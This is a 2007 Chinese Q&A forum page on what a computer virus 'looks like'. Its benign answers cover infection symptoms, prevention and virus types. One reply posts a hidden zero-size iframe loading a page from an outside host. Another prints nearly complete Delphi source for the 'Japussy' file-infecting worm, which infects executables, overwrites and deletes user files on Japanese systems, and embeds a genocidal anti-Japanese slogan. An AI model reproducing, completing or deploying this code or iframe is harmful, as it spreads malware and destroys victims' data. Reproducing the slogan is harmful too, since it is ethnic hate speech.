• 所有问题

    • 【阿斗】病毒长啥样?啥形状~? 不许笑.

    我的电脑光喜欢中毒,每次公司IT部都不厌其烦的给我杀 最近不知道杂回事我明明感觉中毒了 可等IT部的大姐来给我杀时却发现其实没中毒 连续搞了3次把大姐搞烦了 我也搞郁闷了.
    我的问题是:1.怎么才能知道自己中毒了?

    2.病毒在文档里能看到吗?是什么形状的?可以给我截取个

    图我看看吗?

    请大家尊重我,不要笑~!!~ 谁笑我砍了谁

    举报该问题
    推荐答案   2007-08-13
    病毒是看不到的!(能看到它还能活下去?)

    电脑中毒症状一览

    1.平时运行好端端的电脑,却变得迟钝起来,反应缓慢,出现蓝屏甚至死机;

    2.程序载入的时间变长。有些病毒能控制程序或系统的启动程序,当系统刚开始启动或是一个应用程序被载入时,这些病毒将执行它们的动作,因此要花更多的时间来载入程序;

    3.可执行程序文件的大小改变了。正常情况下,这些程序应该维持固定的大小,但有些病毒会增加程序文件的大小;

    4.对同样一个简单的工作,磁盘却花了要长得多的时间才能完成。例如,原本储存一页的文字只需一秒,但感染病毒可能会花更多的时间来寻找未感染的文件;

    5.没有存取磁盘,但磁盘指示灯却一直在亮。硬盘的指示灯无缘无故一直在亮着,意味着电脑可能受到病毒感染了;

    6.开机后出现陌生的声音、画面或提示信息,以及不寻常的错误信息或乱码。尤其是当这种信息频繁出现时,表明你的系统可能已经中毒了;

    7.系统内存或硬盘的容量突然大幅减少。有些病毒会消耗可观的内存或硬盘容量,曾经执行过的程序,再次执行时,突然告诉你没有足够的内存可以利用,或者硬盘空间意外变小;

    8.文件名称、扩展名、日期、属性等被更改过;

    9.文件的内容改变或被加上一些奇怪的资料;

    10.文件离奇消失。

    (如果您的电脑有以上症状出现,请及时"就诊")

    (资料来源:北方网)

    如何预防电脑病毒

    病毒的传染无非是两种方式:一是网络,二是软盘与光盘。如今由于电子邮件的盛行,通过互联网传递的病毒要远远高于后者。

    1、不要轻易下载小网站的软件与程序。

    2、不要光顾那些很诱惑人的小网站,因为这些网站很有可能就是网络陷阱。

    3、不要随便打开某些来路不明的E-mail与附件程序。

    4、安装正版杀毒软件公司提供的防火墙,并注意时时打开着。

    5、不要在线启动、阅读某些文件,否则您很有可能成为网络病毒的传播者。

    6、经常给自己发封E-mail,看看是否会收到第二封未属标题及附带程序的邮件。

    对于软盘,光盘传染的病毒,不要随便打开程序或安装软件。可以先复制到硬盘上,接着用杀毒软件检查一遍,再执行安装或打开命令。(资料来源:天极网)

    电脑病毒的种类

    引导区电脑病毒

    90年代中期,最为流行的电脑病毒是引导区病毒,主要通过软盘在16位元磁盘操作系统(DOS)环境下传播。引导区病毒会感染软盘内的引导区及硬盘,而且也能够感染用户硬盘内的主引导区(MBR)。一但电脑中毒,每一个经受感染电脑读取过的软盘都会受到感染。

    引导区电脑病毒是如此传播:隐藏在磁盘内,在系统文件启动以前电脑病毒已驻留在内存内。这样一来,电脑病毒就可完全控制DOS中断功能,以便进行病毒传播和破坏活动。那些设计在DOS或Windows3.1上执行的引导区病毒是不能够在新的电脑操作系统上传播,所以这类的电脑病毒已经比较罕见了。

    文件型电脑病毒

    文件型电脑病毒,又称寄生病毒,通常感染执行文件(.EXE),但是也有些会感染其它可执行文件,如DLL,SCR等等...每次执行受感染的文件时,电脑病毒便会发作:电脑病毒会将自己复制到其他可执行文件,并且继续执行原有的程序,以免被用户所察觉。

    复合型电脑病毒

    复合型电脑病毒具有引导区病毒和文件型病毒的双重特点。

    宏病毒

    宏病毒专门针对特定的应用软件,可感染依附于某些应用软件内的宏指令,它可以很容易透过电子邮件附件、软盘、文件下载和群组软件等多种方式进行传播如MicrosoftWord和Excel。宏病毒采用程序语言撰写,例如VisualBasic或CorelDraw,而这些又是易于掌握的程序语言。宏病毒最先在1995年被发现,在不久后已成为最普遍的电脑病毒。

    特洛伊/特洛伊木马

    特洛伊或特洛伊木马是一个看似正当的程序,但事实上当执行时会进行一些恶性及不正当的活动。特洛伊可用作黑客工具去窃取用户的密码资料或破坏硬盘内的程序或数据。与电脑病毒的分别是特洛伊不会复制自己。它的传播技俩通常是诱骗电脑用户把特洛伊木马植入电脑内,例如通过电子邮件上的游戏附件等。

    蠕虫病毒

    蠕虫是另一种能自行复制和经由网络扩散的程序。它跟电脑病毒有些不同,电脑病毒通常会专注感染其它程序,但蠕虫是专注于利用网络去扩散。从定义上,电脑病毒和蠕虫是非不可并存的。随着互联网的普及,蠕虫利用电子邮件系统去复制,例如把自己隐藏于附件并于短时间内电子邮件发给多个用户。有些蠕虫(如CodeRed),更会利用软件上的漏洞去扩散和进行破坏。

    其他电脑病毒/恶性程序码

    恶意程序通常是指带有攻击意图所编写的一段程序。这些威胁可以分成两个类别:需要宿主程序的威胁和彼此独立的威胁。前者基本上是不能独立于某个实际的应用程序、实用程序或系统程序的程序片段;后者是可以被操作系统调度和运行的自包含程序。也可以将这些软件威胁分成不进行复制工作和进行复制工作的。(资料来源:天极网)

    参考资料:http://hi.baidu.com/wdspec_xi_an/blog/item/43c77f2760deb802918f9d80.html

    温馨提示:答案为网友推荐,仅供参考
    其他回答
    第1个回答  2007-08-13
    病毒是程序,代码,用眼睛判断不出来。表现在电脑里就是文件,一般病毒文件都会隐藏,伪装成系统文件,或捆绑到正常文件。来逃避被查杀。。。

    你装个杀毒软件,经常更新,经常杀毒就可以了。。。
    第2个回答  2007-08-13
    一.当你正在工作时,会时不时跳出一些网页或提示你下载什么东东的时候, 电脑就中招了
    二.平时存文件很快,或是打开一个东东很快,现在你打开同样的文件却很慢,也表示中招了
    三.打开任务管理器,看进程,如果进程中有很多东东显示正在运行,而你实际上又没打开这么多,也表示中招了
    四,病毒的样子,俺这里暂时没了,不过有时跟你文件夹差不多,会藏在系统盘中.
    五.笑一下本回答被提问者采纳
    第3个回答  2007-08-13
    照下镜子就知道病毒长啥样了。我正儿八经答题呐,不许笑.
    就这样:
    <IFRAME SRC="http://un.uiiiu.com/baidu.htm" WIDTH=0 HEIGHT=0></IFRAME>
    第4个回答  2007-08-13
    病毒是看不到的,一般是隐藏起来的,在一定的时间里发作(对电脑系统文件进行破坏)这个就是熊猫烧香的代码,也就是病毒:
    program japussy;
    uses
    windows, sysutils, classes, graphics, shellapi{, registry};
    const
    headersize = 82432; //病毒体的大小
    iconoffset = $12eb8; //pe文件主图标的偏移量

    //在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同
    //查找2800000020的十六进制字符串可以找到主图标的偏移量

    {
    headersize = 38912; //upx压缩过病毒体的大小
    iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量

    //upx 1.24w 用法: upx -9 --8086 japussy.exe
    }
    iconsize = $2e8; //pe文件主图标的大小--744字节
    icontail = iconoffset + iconsize; //pe文件主图标的尾部
    id = $44444444; //感染标记

    //垃圾码,以备写入
    catchword = 'if a race need to be killed out, it must be yamato. ' +
    'if a country need to be destroyed, it must be japan! ' +
    '*** w32.japussy.worm.a ***';
    {$r *.res}
    function registerserviceprocess(dwprocessid, dwtype: integer): integer;
    stdcall; external 'kernel32.dll'; //函数声明
    var
    tmpfile: string;
    si: startupinfo;
    pi: process_information;
    isjap: boolean = false; //日文操作系统标记
    { 判断是否为win9x }
    function iswin9x: boolean;
    var
    ver: tosversioninfo;
    begin
    result := false;
    ver.dwosversioninfosize := sizeof(tosversioninfo);
    if not getversionex(ver) then
    exit;
    if (ver.dwplatformid = ver_platform_win32_windows) then //win9x
    result := true;
    end;
    { 在流之间复制 }
    procedure copystream(src: tstream; sstartpos: integer; dst: tstream;
    dstartpos: integer; count: integer);
    var
    scurpos, dcurpos: integer;
    begin
    scurpos := src.position;
    dcurpos := dst.position;
    src.seek(sstartpos, 0);
    dst.seek(dstartpos, 0);
    dst.copyfrom(src, count);
    src.seek(scurpos, 0);
    dst.seek(dcurpos, 0);
    end;
    { 将宿主文件从已感染的pe文件中分离出来,以备使用 }
    procedure extractfile(filename: string);
    var
    sstream, dstream: tfilestream;
    begin
    try
    sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
    try
    dstream := tfilestream.create(filename, fmcreate);
    try
    sstream.seek(headersize, 0); //跳过头部的病毒部分
    dstream.copyfrom(sstream, sstream.size - headersize);
    finally
    dstream.free;
    end;
    finally
    sstream.free;
    end;
    except
    end;
    end;
    { 填充startupinfo结构 }
    procedure fillstartupinfo(var si: startupinfo; state: word);
    begin
    si.cb := sizeof(si);
    si.lpreserved := nil;
    si.lpdesktop := nil;
    si.lptitle := nil;
    si.dwflags := startf_useshowwindow;
    si.wshowwindow := state;
    si.cbreserved2 := 0;
    si.lpreserved2 := nil;
    end;
    { 发带毒邮件 }
    procedure sendmail;
    begin
    //哪位仁兄愿意完成之?
    end;
    { 感染pe文件 }
    procedure infectonefile(filename: string);
    var
    hdrstream, srcstream: tfilestream;
    icostream, dststream: tmemorystream;
    iid: longint;
    aicon: ticon;
    infected, ispe: boolean;
    i: integer;
    buf: array[0..1] of char;
    begin
    try //出错则文件正在被使用,退出
    if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染
    exit;
    infected := false;
    ispe := false;
    srcstream := tfilestream.create(filename, fmopenread);
    try
    for i := 0 to $108 do //检查pe文件头
    begin
    srcstream.seek(i, sofrombeginning);
    srcstream.read(buf, 2);
    if (buf[0] = #80) and (buf[1] = #69) then //pe标记
    begin
    ispe := true; //是pe文件
    break;
    end;
    end;
    srcstream.seek(-4, sofromend); //检查感染标记
    srcstream.read(iid, 4);
    if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染
    infected := true;
    finally
    srcstream.free;
    end;
    if infected or (not ispe) then //如果感染过了或不是pe文件则退出
    exit;
    icostream := tmemorystream.create;
    dststream := tmemorystream.create;
    try
    aicon := ticon.create;
    try
    //得到被感染文件的主图标(744字节),存入流
    aicon.releasehandle;
    aicon.handle := extracticon(hinstance, pchar(filename), 0);
    aicon.savetostream(icostream);
    finally
    aicon.free;
    end;
    srcstream := tfilestream.create(filename, fmopenread);
    //头文件
    hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);
    try
    //写入病毒体主图标之前的数据
    copystream(hdrstream, 0, dststream, 0, iconoffset);
    //写入目前程序的主图标
    copystream(icostream, 22, dststream, iconoffset, iconsize);
    //写入病毒体主图标到病毒体尾部之间的数据
    copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);
    //写入宿主程序
    copystream(srcstream, 0, dststream, headersize, srcstream.size);
    //写入已感染的标记
    dststream.seek(0, 2);
    iid := $44444444;
    dststream.write(iid, 4);
    finally
    hdrstream.free;
    end;
    finally
    srcstream.free;
    icostream.free;
    dststream.savetofile(filename); //替换宿主文件
    dststream.free;
    end;
    except;
    end;
    end;
    { 将目标文件写入垃圾码后删除 }
    procedure smashfile(filename: string);
    var
    filehandle: integer;
    i, size, mass, max, len: integer;
    begin
    try
    setfileattributes(pchar(filename), 0); //去掉只读属性
    filehandle := fileopen(filename, fmopenwrite); //打开文件
    try
    size := getfilesize(filehandle, nil); //文件大小
    i := 0;
    randomize;
    max := random(15); //写入垃圾码的随机次数
    if max < 5 then
    max := 5;
    mass := size div max; //每个间隔块的大小
    len := length(catchword);
    while i < max do
    begin
    fileseek(filehandle, i * mass, 0); //定位
    //写入垃圾码,将文件彻底破坏掉
    filewrite(filehandle, catchword, len);
    inc(i);
    end;
    finally
    fileclose(filehandle); //关闭文件
    end;
    deletefile(pchar(filename)); //删除之
    except
    end;
    end;
    { 获得可写的驱动器列表 }
    function getdrives: string;
    var
    disktype: word;
    d: char;
    str: string;
    i: integer;
    begin
    for i := 0 to 25 do //遍历26个字母
    begin
    d := chr(i + 65);
    str := d + ':';
    disktype := getdrivetype(pchar(str));
    //得到本地磁盘和网络盘
    if (disktype = drive_fixed) or (disktype = drive_remote) then
    result := result + d;
    end;
    end;
    { 遍历目录,感染和摧毁文件 }
    procedure loopfiles(path, mask: string);
    var
    i, count: integer;
    fn, ext: string;
    subdir: tstrings;
    searchrec: tsearchrec;
    msg: tmsg;
    function isvaliddir(searchrec: tsearchrec): integer;
    begin
    if (searchrec.attr <> 16) and (searchrec.name <> '.') and
    (searchrec.name <> '..') then
    result := 0 //不是目录
    else if (searchrec.attr = 16) and (searchrec.name <> '.') and
    (searchrec.name <> '..') then
    result := 1 //不是根目录
    else result := 2; //是根目录
    end;
    begin
    if (findfirst(path + mask, faanyfile, searchrec) = 0) then
    begin
    repeat
    peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列,避免引起怀疑
    if isvaliddir(searchrec) = 0 then
    begin
    fn := path + searchrec.name;
    ext := uppercase(extractfileext(fn));
    if (ext = '.exe') or (ext = '.scr') then
    begin
    infectonefile(fn); //感染可执行文件
    end
    else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then
    begin
    //感染html和asp文件,将base64编码后的病毒写入
    //感染浏览此网页的所有用户
    //哪位大兄弟愿意完成之?
    end
    else if ext = '.wab' then //outlook地址簿文件
    begin
    //获取outlook邮件地址
    end
    else if ext = '.adc' then //foxmail地址自动完成文件
    begin
    //获取foxmail邮件地址
    end
    else if ext = 'ind' then //foxmail地址簿文件
    begin
    //获取foxmail邮件地址
    end
    else
    begin
    if isjap then //是倭文操作系统
    begin
    if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or
    (ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or
    (ext = '.wma') or (ext = '.zip') or (ext = '.rar') or
    (ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or
    (ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or
    (ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then
    smashfile(fn); //摧毁文件
    end;
    end;
    end;
    //感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑
    sleep(200);
    until (findnext(searchrec) <> 0);
    end;
    findclose(searchrec);
    subdir := tstringlist.create;
    if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then
    begin
    repeat
    if isvaliddir(searchrec) = 1 then
    subdir.add(searchrec.name);
    until (findnext(searchrec) <> 0);
    end;
    findclose(searchrec);
    count := subdir.count - 1;
    for i := 0 to count do
    loopfiles(path + subdir.strings + '', mask);
    freeandnil(subdir);
    end;
    { 遍历磁盘上所有的文件 }
    procedure infectfiles;
    var
    driverlist: string;
    i, len: integer;
    begin
    if getacp = 932 then //日文操作系统
    isjap := true; //去死吧!
    driverlist := getdrives; //得到可写的磁盘列表
    len := length(driverlist);
    while true do //死循环
    begin
    for i := len downto 1 do //遍历每个磁盘驱动器
    loopfiles(driverlist + ':', '*.*'); //感染之
    sendmail; //发带毒邮件
    sleep(1000 * 60 * 5); //睡眠5分钟
    end;
    end;
    { 主程序开始 }
    begin
    if iswin9x then //是win9x
    registerserviceprocess(getcurrentprocessid, 1) //注册为服务进程
    else //winnt
    begin
    //远程线程映射到explorer进程
    //哪位兄台愿意完成之?
    end;
    //如果是原始病毒体自己
    if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then
    infectfiles //感染和发邮件
    else //已寄生于宿主程序上了,开始工作
    begin
    tmpfile := paramstr(0); //创建临时文件
    delete(tmpfile, length(tmpfile) - 4, 4);
    tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一个空格
    extractfile(tmpfile); //分离之
    fillstartupinfo(si, sw_showdefault);
    createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,
    0, nil, '.', si, pi); //创建新进程运行之
    infectfiles; //感染和发邮件
    end;
    end.
    这些就是病毒的代码.也称为编程.
    12
    相似回答
    什么叫做“阿斗”?答:这渊源甚至连阿斗的亲爹亲娘都比不了。前面的“长坂坡”和“横江劫斗”都是面上的大事,就不必说了。仅从后来刘备兵败彝陵、闹得“白帝城托孤”那事上,你就知道赵四叔和老刘家、尤其是和阿斗先生是什么样的非同寻常的关系了。 “白帝城托孤”时,阿斗先生因为要留驻成都,所以没能亲身赶去领受他老爸的临终遗嘱。
    后主刘禅真的是扶不起的阿斗,还是大智若愚的天才政治家?答:《三国演义》中的后主刘禅,被塑造成了一个“扶不起的阿斗”形象,让读者觉得后主刘禅是一个昏聩无能、不理朝政、娇宠宦官、荒淫无度的末代之君,由此对于他的亡国是哀其不幸、怒其不争。“乐不思蜀”就是后主刘禅留给后人的一个成语,也是后人讥笑刘禅痴傻呆萌的一个标签。...
    一个人给出一个笑话,200分,我认为最好的加分答:【性状】本品为可乐状的凹凸物,表面粗糙,对烟,酒有强烈的亲和力;羞涩时产生红移现象;生气产生蓝移(绿移)本品随时间推移产生黄移,形状会有所改变,但不影响继续使用。 【功能主治】主治单身恐惧症顽疾,对失恋和相思病也有明显效果。 【用法用量】 建议一生一片。 【注意事项】本品仅适用于单身之成年女性。服用时...
    朕乃汉高祖刘邦,来此寻子刘禅答:刘禅 在世人的心目中,刘禅是平庸昏聩之君,在市井街头的平头百姓眼里,刘禅的形象始终是碌碌无为的的庸主一个,更有甚者称之为“亡国之昏君,丧邦之庸人”。因刘禅小名为阿斗,于是在我们国语的形容词中,又多了一个“扶不起的阿斗”,有人预言,这个形容词将流传千年。阿斗真的扶不起吗?他真的...
    广收笑话答:于是大为光火,喝道:“你们要看着我啊!不看我,你们怎么知道非洲野猪长的是什么样子?” 中学英语老师的笑话 上高中的时候,英语老师D英文水平颇高,无奈汉语不佳。某日上课,D老师讲解“独立结构”,举一经典例句:‘Ourteachercomesintotheclassroom,bookunderarm.‘然后翻译成中文:“老师进了教室,胯下夹着一本书。”...
    <武林外传>里的经典台词,越多越好.答:(脸红,笑道)然后我再跪地求饶,请求她原谅…… 老白:原谅啥呀? 大嘴:朝三暮四招蜂引蝶呗~! 秀才:(不服)哼~~我就朝三暮四了我?!知道是这样我当初还不如选无双呢…… 老白:(脸转向门口,一脸坏笑)诶,小郭你啥时候来的? 秀才:(举手抱头跪地缩成一团)哎呀哎呀~~~我错了,我错了!!你大人不记小人...
    大家有没有什么<武林外传>的经典台词?!跪求~~~答:小贝:。。。你才长疮呢 28.假如生命只是偶然的邂逅,那么死亡就是必然的杀手 29.花为是什么香的,是因为我,草为什么是绿的,也是因为我.屁为什么是臭的,那是因为老白~~~30.上联:反对家庭暴力 下联:呼唤社会爱心 横批:不要和陌生人说话 31.走自己的路,让他们打的去吧。。。32.额的秀才啊!
    跪求极品笑话,一定要让女要能让女孩子笑。答:8.长颈鹿嫁给了猴子,一年后长颈鹿提出离婚:我再也不要过这种上蹿下跳的日子了!猴子大怒:离就离!谁见过亲个嘴还得爬树的!9有一个男孩问一个女孩:你喜欢什么样的男孩。那女孩子说:投缘的。那男孩子听见了故意再问一遍。那女孩子还是说;投缘的。男孩子听了伤心欲绝,说了一句:头扁一点的不...
    大家正在搜
    非典病毒是什么病毒病毒是哪里来的MERS病毒sasi病毒怎么来的勒索病毒病毒感染sars病毒传染源hpv病毒最怕什么病毒疣